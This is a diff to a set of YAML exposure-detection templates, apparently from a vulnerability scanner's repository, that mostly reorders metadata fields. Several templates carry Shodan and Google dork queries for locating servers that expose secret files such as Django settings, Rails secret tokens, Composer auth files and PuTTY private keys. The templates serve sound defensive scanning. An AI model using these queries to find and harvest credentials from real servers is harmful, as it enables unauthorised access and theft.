product: angular - vendor: angularjs tags: exposure,angularjs,files - classification: - cpe: cpe:2.3:a:angularjs:angular:*:*:*:*:node.js:*:*:* http: - method: GET path: @@ -44,4 +44,4 @@ http: status: - 200 -# digest: 4a0a00473045022100a17e551eb0d7282c84cbe80752cfc5cd8bb2cc4bcd1f57210bd3bf8090ff884702203cbb81aa88602b99846e1c74c29e3bcb1ee3d64cf681d7d54f4fda618fc037b0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a17e551eb0d7282c84cbe80752cfc5cd8bb2cc4bcd1f57210bd3bf8090ff884702203cbb81aa88602b99846e1c74c29e3bcb1ee3d64cf681d7d54f4fda618fc037b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/azure-pipelines-exposed.yaml b/http/exposures/files/azure-pipelines-exposed.yaml index 052398b7df..4f465c1095 100644 --- a/http/exposures/files/azure-pipelines-exposed.yaml +++ b/http/exposures/files/azure-pipelines-exposed.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: medium description: Azure Pipelines internal critical file is disclosed. + classification: + cpe: cpe:2.3:a:microsoft:azure_pipelines_agent:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"azure-pipelines.yml" - product: azure_pipelines_agent vendor: microsoft + product: azure_pipelines_agent + shodan-query: html:"azure-pipelines.yml" tags: config,exposure,azure,microsoft,cloud,devops,files - classification: - cpe: cpe:2.3:a:microsoft:azure_pipelines_agent:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b94c0b7ae5c2ca9bfae48435c7a1c090bbabe98b212d1d938b9dc3cf1e163e3022100814b1fc7dcfd68cfebf207a80a54fcdcd53de52cf07bcf2b83b59141ae8b9257:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221008b94c0b7ae5c2ca9bfae48435c7a1c090bbabe98b212d1d938b9dc3cf1e163e3022100814b1fc7dcfd68cfebf207a80a54fcdcd53de52cf07bcf2b83b59141ae8b9257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/bitbucket-pipelines.yaml b/http/exposures/files/bitbucket-pipelines.yaml index 946e6068e4..7c5f1a41d4 100644 --- a/http/exposures/files/bitbucket-pipelines.yaml +++ b/http/exposures/files/bitbucket-pipelines.yaml @@ -4,16 +4,16 @@ info: name: BitBucket Pipelines Configuration Exposure author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"bitbucket-pipelines.yml" - product: bitbucket vendor: atlassian + product: bitbucket + shodan-query: html:"bitbucket-pipelines.yml" tags: exposure,bitbucket,devops,cicd,files - classification: - cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 490a00463044022007328c206da35551b76be9d31fef4244abbd54c4f29c466362271bcaa766791c02207ea142024f126767b6c73826034e5958f9fd4f83f9f330900ea5f3184b8b5a98:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022007328c206da35551b76be9d31fef4244abbd54c4f29c466362271bcaa766791c02207ea142024f126767b6c73826034e5958f9fd4f83f9f330900ea5f3184b8b5a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/cargo-toml-file.yaml b/http/exposures/files/cargo-toml-file.yaml index 103c988b68..71eff68d52 100644 --- a/http/exposures/files/cargo-toml-file.yaml +++ b/http/exposures/files/cargo-toml-file.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://doc.rust-lang.org/cargo/reference/manifest.html + classification: + cpe: cpe:2.3:a:rust-lang:cargo:*:*:*:*:rust:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Cargo.toml" - product: cargo vendor: rust-lang + product: cargo + shodan-query: html:"Cargo.toml" tags: exposure,files,cargo - classification: - cpe: cpe:2.3:a:rust-lang:cargo:*:*:*:*:rust:*:*:* http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 4b0a00483046022100b4763602761da36c759bf47cde4c3002141bd96b9b99caf036cceea4410780da022100f9f3d41f5cad48e3ba3d6ce0a66567a72b77d842a81e6c5bd4a84066d77c0c72:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b4763602761da36c759bf47cde4c3002141bd96b9b99caf036cceea4410780da022100f9f3d41f5cad48e3ba3d6ce0a66567a72b77d842a81e6c5bd4a84066d77c0c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/cold-fusion-cfcache-map.yaml b/http/exposures/files/cold-fusion-cfcache-map.yaml index 337c5602f2..cfdd915353 100644 --- a/http/exposures/files/cold-fusion-cfcache-map.yaml +++ b/http/exposures/files/cold-fusion-cfcache-map.yaml @@ -7,15 +7,15 @@ info: description: Adobe Cold Fusion cfcache.map file is exposed. reference: - https://securiteam.com/windowsntfocus/5bp081f0ac/ - metadata: - max-request: 1 - shodan-query: http.component:"Adobe ColdFusion" - product: coldfusion - vendor: adobe - tags: exposure,coldfusion,adobe,files - classification: cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: adobe + product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" + tags: exposure,coldfusion,adobe,files + http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fef8683860fe862b93f70e5fdba2f718a98660cc60f6a2373959e4121f09e5df02210095aa459081ef46daa33a550d688d8e45729004b187326878bade325f2687a531:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100fef8683860fe862b93f70e5fdba2f718a98660cc60f6a2373959e4121f09e5df02210095aa459081ef46daa33a550d688d8e45729004b187326878bade325f2687a531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/composer-auth-json.yaml b/http/exposures/files/composer-auth-json.yaml index a59a4f62c5..fbc488f645 100644 --- a/http/exposures/files/composer-auth-json.yaml +++ b/http/exposures/files/composer-auth-json.yaml @@ -6,16 +6,16 @@ info: severity: low description: Composer Auth Josn file is disclosed. reference: https://www.exploit-db.com/ghdb/5768 + classification: + cpe: cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - google-query: intext:"index of /" ".composer-auth.json" - product: composer vendor: getcomposer + product: composer + google-query: intext:"index of /" ".composer-auth.json" tags: exposure,devops,files - classification: - cpe: cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220528743ede15c139c840411b47991f9329314ad0aa8fd771f5c4350b142857c9402210088cbdfa074686c7fe9c609ac549b2da1d7f6db05062eb47607952d9e03f81c61:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220528743ede15c139c840411b47991f9329314ad0aa8fd771f5c4350b142857c9402210088cbdfa074686c7fe9c609ac549b2da1d7f6db05062eb47607952d9e03f81c61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/django-secret-key.yaml b/http/exposures/files/django-secret-key.yaml index 78c0cb291b..3f8468d0c5 100644 --- a/http/exposures/files/django-secret-key.yaml +++ b/http/exposures/files/django-secret-key.yaml @@ -7,17 +7,17 @@ info: description: | The Django settings.py file containing a secret key was discovered. An attacker may use the secret key to bypass many security mechanisms and potentially obtain other sensitive configuration information (such as database password) from the settings file. reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key + classification: + cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: verified: true max-request: 7 + vendor: djangoproject + product: django shodan-query: html:settings.py comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.' - product: django - vendor: djangoproject tags: django,exposure,files - classification: - cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* http: - method: GET path: @@ -63,4 +63,4 @@ http: regex: - "os.environ.setdefault\\([\"']DJANGO_SETTINGS_MODULE[\"'],\\s[\"']([a-zA-Z-_0-9]*).settings[\"']\\)" -# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/environment-rb.yaml b/http/exposures/files/environment-rb.yaml index c8cc6f13a8..641aec94fe 100644 --- a/http/exposures/files/environment-rb.yaml +++ b/http/exposures/files/environment-rb.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: medium description: Ruby environment file is exposed. + classification: + cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - google-query: intitle:"index of" "environment.rb" - product: ruby vendor: ruby-lang + product: ruby + google-query: intitle:"index of" "environment.rb" tags: ruby,devops,exposure,files - classification: - cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207cc2acc21d477a6069fc922566e9791eca9bea02ae2dc0519287252901cb4300022100f6f07d90bb3fee86cb451f6c9839a25af3fa7d9c6881e3a3aa76c5d813159326:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502207cc2acc21d477a6069fc922566e9791eca9bea02ae2dc0519287252901cb4300022100f6f07d90bb3fee86cb451f6c9839a25af3fa7d9c6881e3a3aa76c5d813159326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/get-access-token-json.yaml b/http/exposures/files/get-access-token-json.yaml index e0d7cbc97c..f08dfafe3a 100644 --- a/http/exposures/files/get-access-token-json.yaml +++ b/http/exposures/files/get-access-token-json.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: low description: Internal file is exposed in Constant Contact Forms wordpress plugin. + classification: + cpe: cpe:2.3:a:constantcontact:constant_contact_forms:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 2 - google-query: intitle:"index of" "get_access_token.json" - product: constant_contact_forms vendor: constantcontact + product: constant_contact_forms + google-query: intitle:"index of" "get_access_token.json" tags: exposure,files - classification: - cpe: cpe:2.3:a:constantcontact:constant_contact_forms:*:*:*:*:wordpress:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a17410508b8cd9c18863c5613d75419a2e7ee76930a8c4b348656e1b6077e99022100f9cb5a0e7bed2b0d8558d63a0cc54c73ee5bed256286a01ab670dec759389bae:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502201a17410508b8cd9c18863c5613d75419a2e7ee76930a8c4b348656e1b6077e99022100f9cb5a0e7bed2b0d8558d63a0cc54c73ee5bed256286a01ab670dec759389bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/git-mailmap.yaml b/http/exposures/files/git-mailmap.yaml index 8f6ef18d32..1fbe1792ea 100644 --- a/http/exposures/files/git-mailmap.yaml +++ b/http/exposures/files/git-mailmap.yaml @@ -6,16 +6,16 @@ info: severity: low description: Git Mailmap file is exposed. reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html + classification: + cpe: cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:mailmap - product: git vendor: git-scm + product: git + shodan-query: html:mailmap tags: config,exposure,git,mailmap,files - classification: - cpe: cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aea6f55c151da3533a23fff3ea34789c86f4e8634e81e427401c5159d18a3e7102207ec7da22ef8807432cfed1241fe2527f7104a0fdb90d7087a93a0a33fe364798:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100aea6f55c151da3533a23fff3ea34789c86f4e8634e81e427401c5159d18a3e7102207ec7da22ef8807432cfed1241fe2527f7104a0fdb90d7087a93a0a33fe364798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/gitlab-ci-yml.yaml b/http/exposures/files/gitlab-ci-yml.yaml index 637c492688..06204c644e 100644 --- a/http/exposures/files/gitlab-ci-yml.yaml +++ b/http/exposures/files/gitlab-ci-yml.yaml @@ -10,16 +10,16 @@ info: Unauthorized access to this file can lead to severe security risks and operational disruptions. reference: - https://x.com/RootMoksha/status/1816571625388818923/photo/1 + classification: + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"gitlab-ci.yml" - product: gitlab vendor: gitlab + product: gitlab + shodan-query: html:"gitlab-ci.yml" tags: exposure,config,cicd,gitlab - classification: - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* http: - method: GET path: @@ -53,4 +53,5 @@ http: - "releasePath:" - "sshUser:" condition: and -# digest: 4a0a00473045022007a39762d89b6a8d4ed1692fa3b994f80447b9ae07e9d86415c3a8ae50101fd2022100a58332134fdfa5d4f624aa7017194ef05c2c25a656f10e5e1b3560491421e724:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022007a39762d89b6a8d4ed1692fa3b994f80447b9ae07e9d86415c3a8ae50101fd2022100a58332134fdfa5d4f624aa7017194ef05c2c25a656f10e5e1b3560491421e724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/go-mod-disclosure.yaml b/http/exposures/files/go-mod-disclosure.yaml index cabcd8916d..2967019a20 100644 --- a/http/exposures/files/go-mod-disclosure.yaml +++ b/http/exposures/files/go-mod-disclosure.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: go.mod internal file is exposed. + classification: + cpe: cpe:2.3:a:golang:go:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"go.mod" - product: go vendor: golang + product: go + shodan-query: html:"go.mod" tags: exposure,files,go - classification: - cpe: cpe:2.3:a:golang:go:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce65da202aa15b908bb7eea37f489e908dd5d6d1ab1b80ebcf465254da1afbc302205bca379efacba2a0b37e7e20f6745cf49977a8f23e0b51081b231defa8346862:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ce65da202aa15b908bb7eea37f489e908dd5d6d1ab1b80ebcf465254da1afbc302205bca379efacba2a0b37e7e20f6745cf49977a8f23e0b51081b231defa8346862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/gradle-libs.yaml b/http/exposures/files/gradle-libs.yaml index 90a67934e2..565a4813ad 100644 --- a/http/exposures/files/gradle-libs.yaml +++ b/http/exposures/files/gradle-libs.yaml @@ -4,16 +4,16 @@ info: name: Gradle Library Version Disclosure author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:gradle:gradle:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - github-query: filename:libs.versions.toml - product: gradle vendor: gradle + product: gradle + github-query: filename:libs.versions.toml tags: file,gradle,exposure - classification: - cpe: cpe:2.3:a:gradle:gradle:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 4b0a0048304602210080edd28e23b35c989037deb44531294eb9982daa89844ac847928bc471217ba5022100f9dde0727dc6c3bce417ab75bb24ee2564634eba671def40049a6364b134a36a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210080edd28e23b35c989037deb44531294eb9982daa89844ac847928bc471217ba5022100f9dde0727dc6c3bce417ab75bb24ee2564634eba671def40049a6364b134a36a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/npm-cli-metrics-json.yaml b/http/exposures/files/npm-cli-metrics-json.yaml index 69974ff672..e5d6577b96 100644 --- a/http/exposures/files/npm-cli-metrics-json.yaml +++ b/http/exposures/files/npm-cli-metrics-json.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: low description: anonymous-cli-metrics.json internal file in NPM is exposed. + classification: + cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"anonymous-cli-metrics.json" - product: npm vendor: npmjs + product: npm + shodan-query: html:"anonymous-cli-metrics.json" tags: npm,devops,exposure,files - classification: - cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eaf7f16886772d6881b4d42ae77c8b6616b04a7e28180a7bed7e15c3337ede25022100ab13085332c05794eef6e9bbdb40f9535a23bccd1649782c36159e906d7abac3:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100eaf7f16886772d6881b4d42ae77c8b6616b04a7e28180a7bed7e15c3337ede25022100ab13085332c05794eef6e9bbdb40f9535a23bccd1649782c36159e906d7abac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/npm-shrinkwrap-exposure.yaml b/http/exposures/files/npm-shrinkwrap-exposure.yaml index e838f6cc84..da6337e994 100644 --- a/http/exposures/files/npm-shrinkwrap-exposure.yaml +++ b/http/exposures/files/npm-shrinkwrap-exposure.yaml @@ -8,16 +8,16 @@ info: A file created by npm shrinkwrap. It is identical to package-lock.json. reference: - https://docs.npmjs.com/cli/v9/configuring-npm/npm-shrinkwrap-json + classification: + cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"npm-shrinkwrap.json" - product: npm vendor: npmjs + product: npm + shodan-query: html:"npm-shrinkwrap.json" tags: config,exposure,npm,files,node - classification: - cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4b0a00483046022100be8c7af965335ed157714bfa31dda10b0e5eb81c3b5c1aeb37f88a2aacb47884022100a91344fb45fa4d8e9fee2b6eb3d317b4e92afed22d813fac680609f7f71bc8a1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100be8c7af965335ed157714bfa31dda10b0e5eb81c3b5c1aeb37f88a2aacb47884022100a91344fb45fa4d8e9fee2b6eb3d317b4e92afed22d813fac680609f7f71bc8a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/nuget-package-config.yaml b/http/exposures/files/nuget-package-config.yaml index db1c16d613..bfc4ca70a9 100644 --- a/http/exposures/files/nuget-package-config.yaml +++ b/http/exposures/files/nuget-package-config.yaml @@ -7,16 +7,16 @@ info: reference: - https://learn.microsoft.com/en-us/nuget/reference/packages-config - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt + classification: + cpe: cpe:2.3:a:microsoft:nuget:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"packages.config" - product: nuget vendor: microsoft + product: nuget + shodan-query: html:"packages.config" tags: exposure,sass,devops,cicd,nuget,files - classification: - cpe: cpe:2.3:a:microsoft:nuget:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,4 @@ http: status: - 200 -# digest: 4a0a0047304502202e84589746805c8bbca0cf94b1bffa171136ccc8b6ad5616fa29d2951f1284d3022100dbd8a24d22bbd58ed9e38a8775142f1982ed9b338529bac0a05e6872e95f2d65:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202e84589746805c8bbca0cf94b1bffa171136ccc8b6ad5616fa29d2951f1284d3022100dbd8a24d22bbd58ed9e38a8775142f1982ed9b338529bac0a05e6872e95f2d65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/oracle-test-cgi.yaml b/http/exposures/files/oracle-test-cgi.yaml index b34665e71f..580c87ec96 100644 --- a/http/exposures/files/oracle-test-cgi.yaml +++ b/http/exposures/files/oracle-test-cgi.yaml @@ -4,16 +4,16 @@ info: name: Oracle Application Server test-cgi Page author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:oracle:http_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Oracle Application Server" - product: http_server vendor: oracle + product: http_server + shodan-query: title:"Oracle Application Server" tags: oracle,exposure - classification: - cpe: cpe:2.3:a:oracle:http_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4a0a00473045022100cedd5def202f2be0f99bce0f6ef56cef370a476362385c7a9f0f14bea8797c4e022029197b802187e3b2f773f7dac74f7d482543a777feba337f46610766f52fdc01:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cedd5def202f2be0f99bce0f6ef56cef370a476362385c7a9f0f14bea8797c4e022029197b802187e3b2f773f7dac74f7d482543a777feba337f46610766f52fdc01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/php-ini.yaml b/http/exposures/files/php-ini.yaml index ee16dd8ee7..1934e81556 100644 --- a/http/exposures/files/php-ini.yaml +++ b/http/exposures/files/php-ini.yaml @@ -6,16 +6,16 @@ info: severity: low description: php.ini file is exposed. reference: https://www.php.net/manual/en/configuration.file.php + classification: + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: php.ini - product: php vendor: php + product: php + shodan-query: php.ini tags: config,exposure,files - classification: - cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204791244ace57877a5bc4296a3919bcde88b1c690125558b459e4b90bf3ddc9a9022100c3d176771453ff2c912b50c6e2b76277e1080a1510b668914cf887991226e6a6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502204791244ace57877a5bc4296a3919bcde88b1c690125558b459e4b90bf3ddc9a9022100c3d176771453ff2c912b50c6e2b76277e1080a1510b668914cf887991226e6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/phpunit-result-cache-exposure.yaml b/http/exposures/files/phpunit-result-cache-exposure.yaml index 46d9449aba..0955a23d04 100644 --- a/http/exposures/files/phpunit-result-cache-exposure.yaml +++ b/http/exposures/files/phpunit-result-cache-exposure.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: PHPUnit cache file is exposed. + classification: + cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:-:*:*:* metadata: verified: true max-request: 1 - shodan-query: ".phpunit.result.cache" - product: phpunit vendor: phpunit_project + product: phpunit + shodan-query: ".phpunit.result.cache" tags: config,exposure,devops,files - classification: - cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:-:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022043f5cb464ce98b2f50368b6a9109c466260171cae0be910601fdc522e75b260d022060013e8c4c77ccfbb8c29f2b943d0835e431e4c2bd2cf6deff507b7f7badca24:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022043f5cb464ce98b2f50368b6a9109c466260171cae0be910601fdc522e75b260d022060013e8c4c77ccfbb8c29f2b943d0835e431e4c2bd2cf6deff507b7f7badca24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/pipeline-configuration.yaml b/http/exposures/files/pipeline-configuration.yaml index 13e5762821..5c7d4389cd 100644 --- a/http/exposures/files/pipeline-configuration.yaml +++ b/http/exposures/files/pipeline-configuration.yaml @@ -4,16 +4,16 @@ info: name: Pipeline Configuration Exposure author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:jenkins:pipeline\\:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"pipeline.yaml" - product: pipeline\\ vendor: jenkins + product: pipeline\\ + shodan-query: html:"pipeline.yaml" tags: devops,exposure,cicd,files - classification: - cpe: cpe:2.3:a:jenkins:pipeline\\:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 4a0a0047304502205ff64e88f88b951c1d5ad0c0baa0db49ba8657abbceb296c6b7e45665b80351a022100a9757ad58008ce71a961f71a5b33dfec8b7dbc38b8912c2331319894bc79dc55:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205ff64e88f88b951c1d5ad0c0baa0db49ba8657abbceb296c6b7e45665b80351a022100a9757ad58008ce71a961f71a5b33dfec8b7dbc38b8912c2331319894bc79dc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/putty-private-key-disclosure.yaml b/http/exposures/files/putty-private-key-disclosure.yaml index a544e70997..2196fae093 100644 --- a/http/exposures/files/putty-private-key-disclosure.yaml +++ b/http/exposures/files/putty-private-key-disclosure.yaml @@ -7,16 +7,16 @@ info: description: Putty internal user key file is exposed. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json + classification: + cpe: cpe:2.3:a:putty:putty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 8 - github-query: filename:putty.ppk - product: putty vendor: putty + product: putty + github-query: filename:putty.ppk tags: exposure,files - classification: - cpe: cpe:2.3:a:putty:putty:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009743a619b8ae5bbb216de2254c978a6aff3bceeb7cc54124697d3e8b2d7b5150022068d3fcc4ef1b0bcfb6c280cd87534daf8cce9751a796c0a344d8751af50b19a7:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221009743a619b8ae5bbb216de2254c978a6aff3bceeb7cc54124697d3e8b2d7b5150022068d3fcc4ef1b0bcfb6c280cd87534daf8cce9751a796c0a344d8751af50b19a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml index c0319a87b4..9846143d01 100644 --- a/http/exposures/files/redmine-settings.yaml +++ b/http/exposures/files/redmine-settings.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/5796 + classification: + cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - google-query: intitle:"index of" "settings.yml" - product: redmine vendor: redmine + product: redmine + google-query: intitle:"index of" "settings.yml" tags: misconfig,redmine,devops,files,exposure - classification: - cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 200 -# digest: 4a0a004730450220186d23b24f9283dfe481d498f9cc88bf5cb7aaa3e997bb2d6ba6ebf7a1285dc2022100ede224056e027e6b184d789d782518d4463405ac3d2a3fd9864d46202deab695:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220186d23b24f9283dfe481d498f9cc88bf5cb7aaa3e997bb2d6ba6ebf7a1285dc2022100ede224056e027e6b184d789d782518d4463405ac3d2a3fd9864d46202deab695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/ruby-rail-storage.yaml b/http/exposures/files/ruby-rail-storage.yaml index 56f51cd5ea..0c7749e2a0 100644 --- a/http/exposures/files/ruby-rail-storage.yaml +++ b/http/exposures/files/ruby-rail-storage.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: low description: Ruby on Rails storage.yml file is disclosed. + classification: + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 - google-query: intitle:"index of" storage.yml - product: rails vendor: rubyonrails + product: rails + google-query: intitle:"index of" storage.yml tags: exposure,ruby,devops,files - classification: - cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* http: - method: GET path: @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ee450f9ad85b2f4a8f1493f6bbfa9c70be1140679ac241496565825f46d6b6c022100a805eb547979651a0a9b66370195632fdb5091606fe033744e2acd93717be5a6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200ee450f9ad85b2f4a8f1493f6bbfa9c70be1140679ac241496565825f46d6b6c022100a805eb547979651a0a9b66370195632fdb5091606fe033744e2acd93717be5a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/secret-token-rb.yaml b/http/exposures/files/secret-token-rb.yaml index b64267f36f..56b6c294cf 100644 --- a/http/exposures/files/secret-token-rb.yaml +++ b/http/exposures/files/secret-token-rb.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: medium description: Ruby Secret token is exposed. + classification: + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - google-query: intitle:"index of" "secret_token.rb" - product: rails vendor: rubyonrails + product: rails + google-query: intitle:"index of" "secret_token.rb" tags: redmine,devops,exposure,ruby,files - classification: - cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 